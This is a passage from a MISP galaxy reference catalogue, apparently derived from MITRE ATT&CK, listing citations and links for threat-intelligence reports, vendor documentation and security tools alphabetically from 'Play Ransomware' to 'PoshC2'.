Don Ovid Ladores, Lucas Silva, Scott Burden, Janus Agcaoili, Ivan Nicole Chavez, Ian Kenefick, Ieriz Nicolle Gonzalez, Paul Pajares. (2022, September 6). Play Ransomware’s Attack Playbook Similar to that of Hive, Nokoyawa. Retrieved September 21, 2023.

The tag is: misp-galaxy:references="Trend Micro Play Ransomware September 06 2022"

Table 14967. Table References

Links

https://www.trendmicro.com/es_es/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html

JPCert PLEAD Downloader June 2018

Tomonaga, S. (2018, June 8). PLEAD Downloader Used by BlackTech. Retrieved May 6, 2020.

The tag is: misp-galaxy:references="JPCert PLEAD Downloader June 2018"

Table 14968. Table References

Links

https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html

Trend Micro PLEAD RTLO

Alintanahin, K.. (2014, May 23). PLEAD Targeted Attacks Against Taiwanese Government Agencies. Retrieved April 22, 2019.

The tag is: misp-galaxy:references="Trend Micro PLEAD RTLO"

Table 14969. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/plead-targeted-attacks-against-taiwanese-government-agencies-2/

fileinfo plist file description

FileInfo.com team. (2019, November 26). .PLIST File Extension. Retrieved October 12, 2021.

The tag is: misp-galaxy:references="fileinfo plist file description"

Table 14970. Table References

Links

https://fileinfo.com/extension/plist

Pnputil.exe - LOLBAS Project

LOLBAS. (2020, December 25). Pnputil.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Pnputil.exe - LOLBAS Project"

Table 14971. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Pnputil/

uptycs Fake POC linux malware 2023

Nischay Hegde and Siddartha Malladi. (2023, July 12). PoC Exploit: Fake Proof of Concept with Backdoor Malware. Retrieved September 28, 2023.

The tag is: misp-galaxy:references="uptycs Fake POC linux malware 2023"

Table 14972. Table References

Links

https://www.uptycs.com/blog/new-poc-exploit-backdoor-malware

GitHub SIP POC Sept 2017

Graeber, M. (2017, September 14). PoCSubjectInterfacePackage. Retrieved January 31, 2018.

The tag is: misp-galaxy:references="GitHub SIP POC Sept 2017"

Table 14973. Table References

Links

https://github.com/mattifestation/PoCSubjectInterfacePackage

Kube Pod

kubenetes. (n.d.). Pod v1 core. Retrieved October 13, 2021.

The tag is: misp-galaxy:references="Kube Pod"

Table 14974. Table References

Links

https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.19/#pod-v1-core

Talos PoetRAT October 2020

Mercer, W. Rascagneres, P. Ventura, V. (2020, October 6). PoetRAT: Malware targeting public and private sector in Azerbaijan evolves . Retrieved April 9, 2021.

The tag is: misp-galaxy:references="Talos PoetRAT October 2020"

Table 14975. Table References

Links

https://blog.talosintelligence.com/2020/10/poetrat-update.html

Talos PoetRAT April 2020

Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020.

The tag is: misp-galaxy:references="Talos PoetRAT April 2020"

Table 14976. Table References

Links

https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html

Talos Zeus Panda Nov 2017

Brumaghin, E., et al. (2017, November 02). Poisoning the Well: Banking Trojan Targets Google Search Results. Retrieved November 5, 2018.

The tag is: misp-galaxy:references="Talos Zeus Panda Nov 2017"

Table 14977. Table References

Links

https://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html#More

FireEye Poison Ivy

FireEye. (2014). POISON IVY: Assessing Damage and Extracting Intelligence. Retrieved November 12, 2014.

The tag is: misp-galaxy:references="FireEye Poison Ivy"

Table 14978. Table References

Links

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf

Umbreon Trend Micro

Fernando Mercês. (2016, September 5). Pokémon-themed Umbreon Linux Rootkit Hits x86, ARM Systems. Retrieved March 5, 2018.

The tag is: misp-galaxy:references="Umbreon Trend Micro"

Table 14979. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/pokemon-themed-umbreon-linux-rootkit-hits-x86-arm-systems/?_ga=2.180041126.367598458.1505420282-1759340220.1502477046

AWS IAM Policies and Permissions

AWS. (n.d.). Policies and permissions in IAM. Retrieved April 1, 2022.

The tag is: misp-galaxy:references="AWS IAM Policies and Permissions"

Table 14980. Table References

Links

https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies.html

EnableMPRNotifications

Microsoft. (2023, January 26). Policy CSP - WindowsLogon. Retrieved March 30, 2023.

The tag is: misp-galaxy:references="EnableMPRNotifications"

Table 14981. Table References

Links

https://learn.microsoft.com/en-us/windows/client-management/mdm/policy-csp-windowslogon

Microsoft DirSync

Microsoft. (n.d.). Polling for Changes Using the DirSync Control. Retrieved March 30, 2018.

The tag is: misp-galaxy:references="Microsoft DirSync"

Table 14982. Table References

Links

https://msdn.microsoft.com/en-us/library/ms677626.aspx

Polyglot Files: a Hacker’s best friend

Li, V. (2019, October 2). Polyglot Files: a Hacker’s best friend. Retrieved September 27, 2022.

The tag is: misp-galaxy:references="Polyglot Files: a Hacker’s best friend"

Table 14983. Table References

Links

https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a

CheckPoint Redaman October 2019

Eisenkraft, K., Olshtein, A. (2019, October 17). Pony’s C&C servers hidden inside the Bitcoin blockchain. Retrieved June 15, 2020.

The tag is: misp-galaxy:references="CheckPoint Redaman October 2019"

Table 14984. Table References

Links

https://research.checkpoint.com/2019/ponys-cc-servers-hidden-inside-the-bitcoin-blockchain/

Kaspersky Poseidon Group

Kaspersky Lab’s Global Research and Analysis Team. (2016, February 9). Poseidon Group: a Targeted Attack Boutique specializing in global cyber-espionage. Retrieved March 16, 2016.

The tag is: misp-galaxy:references="Kaspersky Poseidon Group"

Table 14985. Table References

Links

https://securelist.com/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/73673/

Breach Post-mortem SSH Hijack

Hodgson, M. (2019, May 8). Post-mortem and remediations for Apr 11 security incident. Retrieved February 17, 2020.

The tag is: misp-galaxy:references="Breach Post-mortem SSH Hijack"

Table 14986. Table References

Links

https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident

Elastic Docs Potential Protocol Tunneling via EarthWorm

Elastic. (n.d.). Potential Protocol Tunneling via EarthWorm. Retrieved July 7, 2023.

The tag is: misp-galaxy:references="Elastic Docs Potential Protocol Tunneling via EarthWorm"

Table 14987. Table References

Links

https://www.elastic.co/guide/en/security/current/potential-protocol-tunneling-via-earthworm.html

This is Security Command Line Confusion

  1. Ancel. (2014, August 20). Poweliks – Command Line Confusion. Retrieved March 5, 2018.

The tag is: misp-galaxy:references="This is Security Command Line Confusion"

Table 14988. Table References

Links

https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/

TrendMicro POWELIKS AUG 2014

Santos, R. (2014, August 1). POWELIKS: Malware Hides In Windows Registry. Retrieved August 9, 2018.

The tag is: misp-galaxy:references="TrendMicro POWELIKS AUG 2014"

Table 14989. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/poweliks-malware-hides-in-windows-registry/

Microsoft: Powercfg command-line options

Microsoft. (2021, December 15). Powercfg command-line options. Retrieved June 5, 2023.

The tag is: misp-galaxy:references="Microsoft: Powercfg command-line options"

Table 14990. Table References

Links

https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/powercfg-command-line-options?adlt=strict

Volexity PowerDuke November 2016

Adair, S.. (2016, November 9). PowerDuke: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs. Retrieved January 11, 2017.

The tag is: misp-galaxy:references="Volexity PowerDuke November 2016"

Table 14991. Table References

Links

https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/

Cybereason PowerLess February 2022

Cybereason Nocturnus. (2022, February 1). PowerLess Trojan: Iranian APT Phosphorus Adds New PowerShell Backdoor for Espionage. Retrieved June 1, 2022.

The tag is: misp-galaxy:references="Cybereason PowerLess February 2022"

Table 14992. Table References

Links

https://www.cybereason.com/blog/research/powerless-trojan-iranian-apt-phosphorus-adds-new-powershell-backdoor-for-espionage

MalwareTech Power Loader Aug 2013

MalwareTech. (2013, August 13). PowerLoader Injection – Something truly amazing. Retrieved December 16, 2017.

The tag is: misp-galaxy:references="MalwareTech Power Loader Aug 2013"

Table 14993. Table References

Links

https://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html

Powerpnt.exe - LOLBAS Project

LOLBAS. (2019, July 19). Powerpnt.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Powerpnt.exe - LOLBAS Project"

Table 14994. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/

Sophos PowerShell Command History Forensics

Vikas, S. (2020, August 26). PowerShell Command History Forensics. Retrieved September 4, 2020.

The tag is: misp-galaxy:references="Sophos PowerShell Command History Forensics"

Table 14995. Table References

Links

https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics

Microsoft PowerShell CLM

PowerShell Team. (2017, November 2). PowerShell Constrained Language Mode. Retrieved March 27, 2023.

The tag is: misp-galaxy:references="Microsoft PowerShell CLM"

Table 14996. Table References

Links

https://devblogs.microsoft.com/powershell/powershell-constrained-language-mode/

SensePost PS DDE May 2016

El-Sherei, S. (2016, May 20). PowerShell, C-Sharp and DDE The Power Within. Retrieved November 22, 2017.

The tag is: misp-galaxy:references="SensePost PS DDE May 2016"

Table 14997. Table References

Links

https://sensepost.com/blog/2016/powershell-c-sharp-and-dde-the-power-within/

Powersploit

PowerSploit. (n.d.). Retrieved December 4, 2014.

The tag is: misp-galaxy:references="Powersploit"

Table 14998. Table References

Links

https://github.com/mattifestation/PowerSploit

PowerSploit Documentation

PowerSploit. (n.d.). PowerSploit. Retrieved February 6, 2018.

The tag is: misp-galaxy:references="PowerSploit Documentation"

Table 14999. Table References

Links

http://powersploit.readthedocs.io

PowerShellMagazine PowerSploit July 2014

Graeber, M. (2014, July 8). PowerSploit. Retrieved February 6, 2018.

The tag is: misp-galaxy:references="PowerShellMagazine PowerSploit July 2014"

Table 15000. Table References

Links

http://www.powershellmagazine.com/2014/07/08/powersploit/

GitHub PowerSploit May 2012

PowerShellMafia. (2012, May 26). PowerSploit - A PowerShell Post-Exploitation Framework. Retrieved February 6, 2018.

The tag is: misp-galaxy:references="GitHub PowerSploit May 2012"

Table 15001. Table References

Links

https://github.com/PowerShellMafia/PowerSploit

byt3bl33d3r NTLM Relaying

Salvati, M. (2017, June 2). Practical guide to NTLM Relaying in 2017 (A.K.A getting a foothold in under 5 minutes). Retrieved February 7, 2019.

The tag is: misp-galaxy:references="byt3bl33d3r NTLM Relaying"

Table 15002. Table References

Links

https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html

U.S. CISA Volt Typhoon February 7 2024

Cybersecurity and Infrastructure Security Agency. (2024, February 7). PRC State-Sponsored Actors Compromise and Maintain Persistent Access to U.S. Critical Infrastructure. Retrieved February 9, 2024.

The tag is: misp-galaxy:references="U.S. CISA Volt Typhoon February 7 2024"

Table 15003. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-038a

Zimbra Preauth

Zimbra. (2023, March 16). Preauth. Retrieved May 31, 2023.

The tag is: misp-galaxy:references="Zimbra Preauth"

Table 15004. Table References

Links

https://wiki.zimbra.com/wiki/Preauth

Microsoft Preauthentication Jul 2012

Microsoft. (2012, July 18). Preauthentication. Retrieved August 24, 2020.

The tag is: misp-galaxy:references="Microsoft Preauthentication Jul 2012"

Table 15005. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc961961(v=technet.10)?redirectedfrom=MSDN

Elastic Predicting DGA

Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November 2). Predicting Domain Generation Algorithms with Long Short-Term Memory Networks. Retrieved April 26, 2019.

The tag is: misp-galaxy:references="Elastic Predicting DGA"

Table 15006. Table References

Links

https://arxiv.org/pdf/1611.00791.pdf

WithSecure SystemBC May 10 2021

Callum Roxan, Sami Ruohonen. (2021, May 10). Prelude to Ransomware: SystemBC. Retrieved September 21, 2023.

The tag is: misp-galaxy:references="WithSecure SystemBC May 10 2021"

Table 15007. Table References

Links

https://labs.withsecure.com/publications/prelude-to-ransomware-systembc

Presentationhost.exe - LOLBAS Project

LOLBAS. (2018, May 25). Presentationhost.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Presentationhost.exe - LOLBAS Project"

Table 15008. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Presentationhost/

Microsoft Sub Takeover 2020

Microsoft. (2020, September 29). Prevent dangling DNS entries and avoid subdomain takeover. Retrieved October 12, 2020.

The tag is: misp-galaxy:references="Microsoft Sub Takeover 2020"

Table 15009. Table References

Links

https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover

Microsoft Preventing SMB

Microsoft. (2020, March 10). Preventing SMB traffic from lateral connections and entering or leaving the network. Retrieved June 1, 2020.

The tag is: misp-galaxy:references="Microsoft Preventing SMB"

Table 15010. Table References

Links

https://support.microsoft.com/en-us/help/3185535/preventing-smb-traffic-from-lateral-connections

Palo Alto Prince of Persia

Bar, T., Conant, S., Efraim, L. (2016, June 28). Prince of Persia – Game Over. Retrieved July 5, 2017.

The tag is: misp-galaxy:references="Palo Alto Prince of Persia"

Table 15011. Table References

Links

https://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/

PrintBrm.exe - LOLBAS Project

LOLBAS. (2021, June 21). PrintBrm.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="PrintBrm.exe - LOLBAS Project"

Table 15012. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/PrintBrm/

Print.exe - LOLBAS Project

LOLBAS. (2018, May 25). Print.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Print.exe - LOLBAS Project"

Table 15013. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Print/

Rhingo Security Labs GCP Privilege Escalation

Spencer Gietzen. (n.d.). Privilege Escalation in Google Cloud Platform – Part 1 (IAM). Retrieved May 27, 2022.

The tag is: misp-galaxy:references="Rhingo Security Labs GCP Privilege Escalation"

Table 15014. Table References

Links

https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/

Rhino Google Cloud Privilege Escalation

Spencer Gietzen. (n.d.). Privilege Escalation in Google Cloud Platform – Part 1 (IAM). Retrieved September 21, 2023.

The tag is: misp-galaxy:references="Rhino Google Cloud Privilege Escalation"

Table 15015. Table References

Links

https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/

FireEye APT19

Ahl, I. (2017, June 06). Privileges and Credentials: Phished at the Request of Counsel. Retrieved May 17, 2018.

The tag is: misp-galaxy:references="FireEye APT19"

Table 15016. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html

Anomali Static Kitten February 2021

Mele, G. et al. (2021, February 10). Probable Iranian Cyber Actors, Static Kitten, Conducting Cyberespionage Campaign Targeting UAE and Kuwait Government Agencies. Retrieved March 17, 2021.

The tag is: misp-galaxy:references="Anomali Static Kitten February 2021"

Table 15017. Table References

Links

https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies

Procdump.exe - LOLBAS Project

LOLBAS. (2020, October 14). Procdump.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Procdump.exe - LOLBAS Project"

Table 15018. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Procdump/

Microsoft Process Creation Flags May 2018

Schofield, M. & Satran, M. (2018, May 30). Process Creation Flags. Retrieved June 4, 2019.

The tag is: misp-galaxy:references="Microsoft Process Creation Flags May 2018"

Table 15019. Table References

Links

https://docs.microsoft.com/windows/desktop/ProcThread/process-creation-flags

hasherezade Process Doppelgänging Dec 2017

hasherezade. (2017, December 18). Process Doppelgänging – a new way to impersonate a process. Retrieved December 20, 2017.

The tag is: misp-galaxy:references="hasherezade Process Doppelgänging Dec 2017"

Table 15020. Table References

Links

https://hshrzd.wordpress.com/2017/12/18/process-doppelganging-a-new-way-to-impersonate-a-process/

Microsoft Processes and Threads

Microsoft. (2018, May 31). Processes and Threads. Retrieved September 28, 2021.

The tag is: misp-galaxy:references="Microsoft Processes and Threads"

Table 15021. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads

ProcessHacker Github

ProcessHacker. (2009, October 27). Process Hacker. Retrieved April 11, 2022.

The tag is: misp-galaxy:references="ProcessHacker Github"

Table 15022. Table References

Links

https://github.com/processhacker/processhacker

Leitch Hollowing

Leitch, J. (n.d.). Process Hollowing. Retrieved November 12, 2014.

The tag is: misp-galaxy:references="Leitch Hollowing"

Table 15023. Table References

Links

http://www.autosectools.com/process-hollowing.pdf

Korean FSI TA505 2020

Financial Security Institute. (2020, February 28). Profiling of TA505 Threat Group That Continues to Attack the Financial Sector. Retrieved July 14, 2022.

The tag is: misp-galaxy:references="Korean FSI TA505 2020"

Table 15024. Table References

Links

https://www.fsec.or.kr/user/bbs/fsec/163/344/bbsDataView/1382.do?page=1&column=&search=&searchSDate=&searchEDate=&bbsDataCategory=

Microsoft Profiling Mar 2017

Microsoft. (2017, March 30). Profiling Overview. Retrieved June 24, 2020.

The tag is: misp-galaxy:references="Microsoft Profiling Mar 2017"

Table 15025. Table References

Links

https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/profiling/profiling-overview

Microsoft Win32

Microsoft. (n.d.). Programming reference for the Win32 API. Retrieved March 15, 2020.

The tag is: misp-galaxy:references="Microsoft Win32"

Table 15026. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/api/

CameraShy

ThreatConnect Inc. and Defense Group Inc. (DGI). (2015, September 23). Project CameraShy: Closing the Aperture on China’s Unit 78020. Retrieved December 17, 2015.

The tag is: misp-galaxy:references="CameraShy"

Table 15027. Table References

Links

http://cdn2.hubspot.net/hubfs/454298/Project_CAMERASHY_ThreatConnect_Copyright_2015.pdf

Unit 42 ProjectM March 2016

Falcone, R. and Conant S. (2016, March 25). ProjectM: Link Found Between Pakistani Actor and Operation Transparent Tribe. Retrieved September 2, 2021.

The tag is: misp-galaxy:references="Unit 42 ProjectM March 2016"

Table 15028. Table References

Links

https://unit42.paloaltonetworks.com/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe/

Kaspersky ProjectSauron Blog

Kaspersky Lab’s Global Research & Analysis Team. (2016, August 8). ProjectSauron: top level cyber-espionage platform covertly extracts encrypted government comms. Retrieved August 17, 2016.

The tag is: misp-galaxy:references="Kaspersky ProjectSauron Blog"

Table 15029. Table References

Links

https://securelist.com/faq-the-projectsauron-apt/75533/

Kaspersky TajMahal April 2019

GReAT. (2019, April 10). Project TajMahal – a sophisticated new APT framework. Retrieved October 14, 2019.

The tag is: misp-galaxy:references="Kaspersky TajMahal April 2019"

Table 15030. Table References

Links

https://securelist.com/project-tajmahal/90240/

DarkReading FireEye FIN5 Oct 2015

Higgins, K. (2015, October 13). Prolific Cybercrime Gang Favors Legit Login Credentials. Retrieved October 4, 2017.

The tag is: misp-galaxy:references="DarkReading FireEye FIN5 Oct 2015"

Table 15031. Table References

Links

https://www.darkreading.com/analytics/prolific-cybercrime-gang-favors-legit-login-credentials/d/d-id/1322645?

Talos Promethium June 2020

Mercer, W. et al. (2020, June 29). PROMETHIUM extends global reach with StrongPity3 APT. Retrieved July 20, 2020.

The tag is: misp-galaxy:references="Talos Promethium June 2020"

Table 15032. Table References

Links

https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html

TechNet Credential Guard

Lich, B. (2016, May 31). Protect derived domain credentials with Credential Guard. Retrieved June 1, 2016.

The tag is: misp-galaxy:references="TechNet Credential Guard"

Table 15033. Table References

Links

https://technet.microsoft.com/en-us/itpro/windows/keep-secure/credential-guard

Microsoft Protected Users Security Group

Microsoft. (2016, October 12). Protected Users Security Group. Retrieved May 29, 2020.

The tag is: misp-galaxy:references="Microsoft Protected Users Security Group"

Table 15034. Table References

Links

https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/protected-users-security-group

CISA Remote Monitoring and Management Software

CISA. (n.d.). Protecting Against Malicious Use of Remote Monitoring and Management Software. Retrieved February 2, 2023.

The tag is: misp-galaxy:references="CISA Remote Monitoring and Management Software"

Table 15035. Table References

Links

https://www.cisa.gov/uscert/ncas/alerts/aa23-025a

Protecting Microsoft 365 From On-Premises Attacks

Microsoft. (2022, August 26). Protecting Microsoft 365 from on-premises attacks. Retrieved February 21, 2023.

The tag is: misp-galaxy:references="Protecting Microsoft 365 From On-Premises Attacks"

Table 15036. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/fundamentals/protect-m365-from-on-premises-attacks

SANS PsExec

Pilkington, M. (2012, December 17). Protecting Privileged Domain Accounts: PsExec Deep-Dive. Retrieved August 17, 2016.

The tag is: misp-galaxy:references="SANS PsExec"

Table 15037. Table References

Links

https://www.sans.org/blog/protecting-privileged-domain-accounts-psexec-deep-dive/

Docker Daemon Socket Protect

Docker. (n.d.). Protect the Docker Daemon Socket. Retrieved March 29, 2021.

The tag is: misp-galaxy:references="Docker Daemon Socket Protect"

Table 15038. Table References

Links

https://docs.docker.com/engine/security/protect-access/

Malwarebytes Emotet Dec 2017

Smith, A.. (2017, December 22). Protect your network from Emotet Trojan with Malwarebytes Endpoint Security. Retrieved January 17, 2019.

The tag is: misp-galaxy:references="Malwarebytes Emotet Dec 2017"

Table 15039. Table References

Links

https://support.malwarebytes.com/docs/DOC-2295

ProtocolHandler.exe - LOLBAS Project

LOLBAS. (2022, July 24). ProtocolHandler.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="ProtocolHandler.exe - LOLBAS Project"

Table 15040. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/ProtocolHandler/

cybereason osx proton

Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually Does. Retrieved March 19, 2018.

The tag is: misp-galaxy:references="cybereason osx proton"

Table 15041. Table References

Links

https://www.cybereason.com/blog/labs-proton-b-what-this-mac-malware-actually-does

Provlaunch.exe - LOLBAS Project

LOLBAS. (2023, June 30). Provlaunch.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Provlaunch.exe - LOLBAS Project"

Table 15042. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/

FBI Proxies Credential Stuffing

FBI. (2022, August 18). Proxies and Configurations Used for Credential Stuffing Attacks on Online Customer Accounts . Retrieved July 6, 2023.

The tag is: misp-galaxy:references="FBI Proxies Credential Stuffing"

Table 15043. Table References

Links

https://www.ic3.gov/Media/News/2022/220818.pdf

Sysdig Proxyjacking

Crystal Morin. (2023, April 4). Proxyjacking has Entered the Chat. Retrieved July 6, 2023.

The tag is: misp-galaxy:references="Sysdig Proxyjacking"

Table 15044. Table References

Links

https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/

Password Protected Word Docs

Lawrence Abrams. (2017, July 12). PSA: Don’t Open SPAM Containing Password Protected Word Docs. Retrieved January 5, 2022.

The tag is: misp-galaxy:references="Password Protected Word Docs"

Table 15045. Table References

Links

https://www.bleepingcomputer.com/news/security/psa-dont-open-spam-containing-password-protected-word-docs/

Github PSAttack

Haight, J. (2016, April 21). PS>Attack. Retrieved June 1, 2016.

The tag is: misp-galaxy:references="Github PSAttack"

Table 15046. Table References

Links

https://github.com/jaredhaight/PSAttack

PsExec Russinovich

Russinovich, M. (2004, June 28). PsExec. Retrieved December 17, 2015.

The tag is: misp-galaxy:references="PsExec Russinovich"

Table 15047. Table References

Links

http://windowsitpro.com/systems-management/psexec

SANS UAC Bypass

Medin, T. (2013, August 8). PsExec UAC Bypass. Retrieved June 3, 2016.

The tag is: misp-galaxy:references="SANS UAC Bypass"

Table 15048. Table References

Links

http://pen-testing.sans.org/blog/pen-testing/2013/08/08/psexec-uac-bypass

GitHub PSPKIAudit

HarmJ0y et al. (2021, June 16). PSPKIAudit. Retrieved August 2, 2022.

The tag is: misp-galaxy:references="GitHub PSPKIAudit"

Table 15049. Table References

Links

https://github.com/GhostPack/PSPKIAudit

Psr.exe - LOLBAS Project

LOLBAS. (2020, June 27). Psr.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Psr.exe - LOLBAS Project"

Table 15050. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Psr/

Microsoft PsSetCreateProcessNotifyRoutine routine

Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved December 20, 2017.

The tag is: misp-galaxy:references="Microsoft PsSetCreateProcessNotifyRoutine routine"

Table 15051. Table References

Links

https://msdn.microsoft.com/library/windows/hardware/ff559951.aspx

PTRACE man

Kerrisk, M. (2020, February 9). PTRACE(2) - Linux Programmer’s Manual. Retrieved February 21, 2020.

The tag is: misp-galaxy:references="PTRACE man"

Table 15052. Table References

Links

http://man7.org/linux/man-pages/man2/ptrace.2.html

Wikipedia Public Key Crypto

Wikipedia. (2017, June 29). Public-key cryptography. Retrieved July 5, 2017.

The tag is: misp-galaxy:references="Wikipedia Public Key Crypto"

Table 15053. Table References

Links

https://en.wikipedia.org/wiki/Public-key_cryptography

SingHealth Breach Jan 2019

Committee of Inquiry into the Cyber Attack on SingHealth. (2019, January 10). Public Report of the Committee of Inquiry into the Cyber Attack on Singapore Health Services Private Limited’s Patient Database. Retrieved June 29, 2020.

The tag is: misp-galaxy:references="SingHealth Breach Jan 2019"

Table 15054. Table References

Links

https://www.mci.gov.sg/-/media/mcicorp/doc/report-of-the-coi-into-the-cyber-attack-on-singhealth-10-jan-2019.ashx

pubprn

Jason Gerend. (2017, October 16). pubprn. Retrieved July 23, 2021.

The tag is: misp-galaxy:references="pubprn"

Table 15055. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/pubprn

Pubprn.vbs - LOLBAS Project

LOLBAS. (2018, May 25). Pubprn.vbs. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Pubprn.vbs - LOLBAS Project"

Table 15056. Table References

Links

https://lolbas-project.github.io/lolbas/Scripts/Pubprn/

PaloAlto EncodedCommand March 2017

White, J. (2017, March 10). Pulling Back the Curtains on EncodedCommand PowerShell Attacks. Retrieved February 12, 2018.

The tag is: misp-galaxy:references="PaloAlto EncodedCommand March 2017"

Table 15057. Table References

Links

https://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/

anomali-linux-rabbit

Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot Malware Out of a Hat. Retrieved December 17, 2020.

The tag is: misp-galaxy:references="anomali-linux-rabbit"

Table 15058. Table References

Links

https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat

Anomali Linux Rabbit 2018

Anomali Labs. (2018, December 6). Pulling Linux Rabbit/Rabbot Malware Out of a Hat. Retrieved March 4, 2019.

The tag is: misp-galaxy:references="Anomali Linux Rabbit 2018"

Table 15059. Table References

Links

https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat

Cylance Putter Panda

Gross, J. and Walter, J.. (2016, January 12). Puttering into the Future…​. Retrieved January 22, 2016.

The tag is: misp-galaxy:references="Cylance Putter Panda"

Table 15060. Table References

Links

http://blog.cylance.com/puttering-into-the-future

Oddvar Moe ADS1 Jan 2018

Moe, O. (2018, January 14). Putting Data in Alternate Data Streams and How to Execute It. Retrieved June 30, 2018.

The tag is: misp-galaxy:references="Oddvar Moe ADS1 Jan 2018"

Table 15061. Table References

Links

https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/

Oddvar Moe ADS2 Apr 2018

Moe, O. (2018, April 11). Putting Data in Alternate Data Streams and How to Execute It - Part 2. Retrieved June 30, 2018.

The tag is: misp-galaxy:references="Oddvar Moe ADS2 Apr 2018"

Table 15062. Table References

Links

https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/

Moran RDPieces

Moran, B. (2020, November 18). Putting Together the RDPieces. Retrieved October 17, 2022.

The tag is: misp-galaxy:references="Moran RDPieces"

Table 15063. Table References

Links

https://www.osdfcon.org/presentations/2020/Brian-Moran_Putting-Together-the-RDPieces.pdf

PuTTY Download Page

PuTTY. (n.d.). PuTTY Download Page. Retrieved November 16, 2023.

The tag is: misp-galaxy:references="PuTTY Download Page"

Table 15064. Table References

Links

https://www.putty.org/

Wikipedia pwdump

Wikipedia. (2007, August 9). pwdump. Retrieved June 22, 2016.

The tag is: misp-galaxy:references="Wikipedia pwdump"

Table 15065. Table References

Links

https://en.wikipedia.org/wiki/Pwdump

DFIR Pysa Nov 2020

THe DFIR Report. (2020, November 23). PYSA/Mespinoza Ransomware. Retrieved March 17, 2021.

The tag is: misp-galaxy:references="DFIR Pysa Nov 2020"

Table 15066. Table References

Links

https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/

NHS Digital Pysa Oct 2020

NHS Digital. (2020, October 10). Pysa Ransomware: Another 'big-game hunter' ransomware. Retrieved March 17, 2021.

The tag is: misp-galaxy:references="NHS Digital Pysa Oct 2020"

Table 15067. Table References

Links

https://digital.nhs.uk/cyber-alerts/2020/cc-3633

oletools toolkit

decalage2. (2019, December 3). python-oletools. Retrieved September 18, 2020.

The tag is: misp-galaxy:references="oletools toolkit"

Table 15068. Table References

Links

https://github.com/decalage2/oletools

GitHub PoshC2

Nettitude. (2018, July 23). Python Server for PoshC2. Retrieved April 23, 2019.

The tag is: misp-galaxy:references="GitHub PoshC2"

